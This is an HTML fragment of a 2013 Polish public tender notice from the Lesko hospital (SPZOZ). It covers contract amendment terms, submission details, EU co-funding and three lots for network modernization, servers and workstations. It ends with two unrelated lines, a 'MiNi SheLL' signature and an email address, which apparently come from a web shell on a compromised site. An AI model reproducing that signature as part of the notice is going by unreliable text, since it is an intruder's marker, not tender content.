- braku produktu na rynku i wprowadzenia na jego miejsce nowego, ulepszonego produktu, w przypadku kiedy cena przetargowa zostaje podtrzymana między innymi sytuacje  wycofania produktu z rynku, zaprzestanie produkcji danego produktu , przy
jednoczesnym dostarczeniu produktu zamiennego o parametrach nie gorszych od produktu  objętego umową,- wystąpienia konieczności zmiany umowy, a jeżeli te zmiany spowodują konieczność obniżenia wynagrodzenia Wykonawcy - również obniża wynagrodzenia Wykonawcy, z zastrzeżeniem, że zmiana zakresu nie może wykraczać poza określenie przedmiotu umowy zawarte w Specyfikacji Istotnych Warunków Zamówienia ze względu na:
a. przedstawienie przez Wykonawcę Zamawiającemu pisemnej propozycji zmian, która w razie przyjęcia: przyspieszy ukończenie robót, obniży koszt ponoszony przez Zamawiającego na wykonanie lub utrzymanie robót, poprawi sprawność lub 
zwiększy wartość ukończonych robót dla Zamawiającego, w inny sposób będzie korzystna dla Zamawiającego,
b. wprowadzenie robót zamiennych wynikających z przepisów art. 20 ust. 1 pkt.3 i pkt.4b ustawy Prawo Budowlane o wartości nie przekraczającej wartości określonej za tożsamy zakres w ofercie Wykonawcy, - wystąpienia konieczności zmiany zakresu rzeczowego umowy w sytuacji zmiany technologii prowadzenia prac, ujawnionej w trakcie realizacji umowy, który odbiega od stanu założonego w opisie przedmiotu zamówienia.
2. Ponadto przewiduje się możliwość dokonywania innych zmian umowy, pod warunkiem, że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można  było przewidzieć w chwili zawarcia umowy, a zrealizowanie założonego pierwotnie celu umowy byłoby bez tych zmian niemożliwe lub zmiany te są korzystne dla Zamawiającego 
3. Z wnioskiem o zmianę postanowień umowy może wystąpić zarówno Wykonawca, jak i Zamawiający.
4. Wprowadzenie zmian postanowień zawartej umowy wymaga zgodnego oświadczenia stron, zachowania formy pisemnej w postaci aneksu pod rygorem nieważności. 5. Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej, wartości umowy i nie mogą być niekorzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzozlesko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej w  Lesku ul. Kazimierza Wielkiego 4  38-600 Lesko,  osobiście w pok. nr 225 strona internetowa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2013 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Opieki Zdrowotnej w  Lesku ul. Kazimierza Wielkiego 4  38-600 Lesko,  osobiście w sekretariacie godz. 8:00- 15:00, pocztą, pocztą kurierską.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej z Europejskiego Funduszu Rozwoju Regionalnego w ramach Osi priorytetowej 3  Społeczeństwo informacyjne
Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Modernizacja sieci komputerowej w obiektach Szpitala Powiatowego SPZOZ Lesko przy 
ul. Kochanowskiego 2 wraz z dostosowaniem wydzielonego pomieszczenia na serwerownię obejmująca :1. Wykonanie instalacji wg sporządzonego projektu okablowania strukturalnego urządzenia pasywne. 
2. Adaptację wyznaczonego pomieszczenie na serwerownię, wraz z instalacją klimatyzacji oraz zasilaniem awaryjnym UPS. 
3.  Dostarczeniem, instalacją i konfiguracją urządzeń aktywnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zawiera siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.42.80.00-9, 32.41.00.00-0, 45.31.10.00-0, 32.42.00.00-3, 45.31.43.10-7, 32.42.10.00-0, 45.31.43.00-4, 45.31.43.20-0, 30.21.12.00-3, 35.10.00.00-5, 32.42.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sprzęt komputerowy wraz z konfiguracją i wdrożeniem, serwery z infrastrukturą pomocniczą  
1 Serwery główne - 2 szt.,
2 Pamięć masowa - 1 szt.,
3 Serwer pomocniczy do backupu - 1szt.
4 Biblioteka taśmowa  LTO-4  archiwizowania - 1 szt.
5 Oprogramowanie systemowe dla serwerów - 3 lic.,
6 Oprogramowanie do wirtualizacji serwerów - 1 lic.,
7 Oprogramowanie do backupu - 1 lic..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szczegóły zawarte w siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.82.00.00-2, 48.82.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiot zamówienia na ZADANIE nr 3.  
1. stacje robocze  komputery, monitory LCD, oprogramowanie systemowe, antywirusy  85 szt. 
2. stacja komputerowa oprogramowanie systemowe, antywirus  1 szt. 3. urządzenia wielofunkcyjne dla użytkowników  drukarek laserowych sieciowych z opcją skanowania 20 szt., 4. urządzenia wielofunkcyjne dla użytkowników drukarek laserowych sieciowych z opcją skanowania 31 szt.,
5. urządzenia wielofunkcyjne dla archiwizacji dokumentacji medycznej 6. infomat - 1 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szczegóły zawiera siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.40.00-2, 30.20.00.00-1, 30.23.60.00-2, 30.23.21.10-8, 30.21.61.10-0, 30.23.72.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com